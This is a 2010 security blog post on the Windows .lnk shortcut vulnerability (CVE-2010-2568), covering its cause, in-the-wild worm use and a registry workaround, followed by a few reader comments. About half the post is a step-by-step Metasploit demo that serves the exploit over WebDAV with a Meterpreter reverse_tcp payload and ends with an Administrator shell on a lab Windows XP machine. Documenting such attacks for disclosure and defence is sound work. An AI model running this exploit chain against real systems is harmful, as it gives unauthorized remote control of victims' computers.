Windows “Shortcuts to Pawnage”
On 16th July, 2010 a researchers found out a new shortcut to Pawn Remote System in an unusual way. They crafted a way to exploit windows shortcut files, commonly referred as .lnk file in order to gain unauthorized access to remote computer.
Users need not even click the shortcut file, if s/he views it in explorer; that’s it…Game Over!! Interesting right?
Let’s dig deeper to know the exact cause of this shortcut to pawnage 
Vulnerability:
There exists an unpatched vulnerability (CVE-2010-2568) in the Windows .lnk file (aka shortcuts)/piff file parser code. Windows automatically executes the malicious code when a specially crafted .lnk/piff file is read by windows explorer or any other similar application displaying icons for the shortcuts. This vulnerability can be exploited locally from USB drives or over a network shared or even from remote WebDAV locations.
As this vulnerability is not related to buffer overflows or memory corruptions etc.; ASLR and protected mode will not help in avoiding exploitation. All versions of Windows OS are affected from this vulnerability.
Exploitation:
According to AV vendor VirusBlokAda, this vulnerability is already being exploited in the wild and has seen fully patched Windows 7 machines getting infected by a worm exploiting this vulnerability. See references for the complete document on the Worm Analysis.
After successful exploitation of the vulnerability, worm sends “SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!” message to the Windows debugger.
Metasploit also just released an exploit module for this attack which uses WebDAV location as an attack vector. We will have a complete demonstration of this exploit in the pawnage section.
Workarounds/Mitigation:
Microsoft is asking end users to utilize following registry workaround to disable icons from being displayed in windows shell. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.
- Open RegEdit
- Locate HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
- Change the value from {00021401-0000-0000-C000-000000000046} to “”
- Locate HKEY_CLASSES_ROOT\piffile\shellex\IconHandler
- Change the value from {00021401-0000-0000-C000-000000000046} to “”
- Close Regedit.
- Restart the explorer.exe or reboot windows.
Disabling WebClient Services will also help protect systems from attacks using WebDAV attack vectors.
Pawanage demo:
Let’s look at this demo on pawning a windows XP box using Metasploit. In this demo, metasploit is redirecting victims to malicious windows share containing specially crafter .lnk file and a malicious .dll file containing actual payload using a WebDAV requests.
As soon as this windows share from attackers box is read by victim’s shell(windows explorer in our case); specially crafted .lnk file inject payload .dll file in the address space of victim’s explorer process which drives the payload to gain shell.
Following is the steps followed by an attacker to exploit this vulnerability.
msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:73:7b:ff
inet addr:192.168.146.128 Bcast:192.168.146.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe73:7bff/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:502 errors:0 dropped:0 overruns:0 frame:0
TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:50019 (50.0 KB) TX bytes:5554 (5.5 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16 errors:0 dropped:0 overruns:0 frame:0
TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:960 (960.0 B) TX bytes:960 (960.0 B)
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.146.128
LHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.146.128 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.146.128
SRVHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.146.128:4444
[*]
[*] Send vulnerable clients to \\192.168.146.128\ncSTz\
[*]
[*] Using URL: http://192.168.146.128:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) > [*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/desktop.ini
[*] Sending 404 for /ncSTz/desktop.ini ...
[*] Sending LNK file to 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.manifest ...
[*] Sending DLL payload 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.123.Manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.123.Manifest ...
[*] Sending stage (748032 bytes) to 192.168.146.129
[*] Meterpreter session 1 opened (192.168.146.128:4444 -> 192.168.146.129:1039) at Wed Jul 21 00:11:19 +0530 2010
msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter VICTIM-AJG5DLK5\Administrator @ VICTIM-AJG5DLK5 192.168.146.128:4444 -> 192.168.146.129:1039
msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIM-AJG5DLK5
OS : Windows XP (Build 2600, ).
Arch : x86
Language: en_US
GAME OVER!!!
Following is the video demonstration of above attack using Metasploit.
July 24th, 2010 at 10:53 pm
When is the video coming.
July 25th, 2010 at 11:45 am
Just posted!!!
Enjoy
July 26th, 2010 at 12:31 am
video is good. Thanks for sharing.
July 26th, 2010 at 8:35 am
Not bad, but nowhere near as 31337 as this rockstar! http://www.youtube.com/watch?v=SXmv8quf_xM&feature=player_embedded
July 27th, 2010 at 8:19 am
Very amusing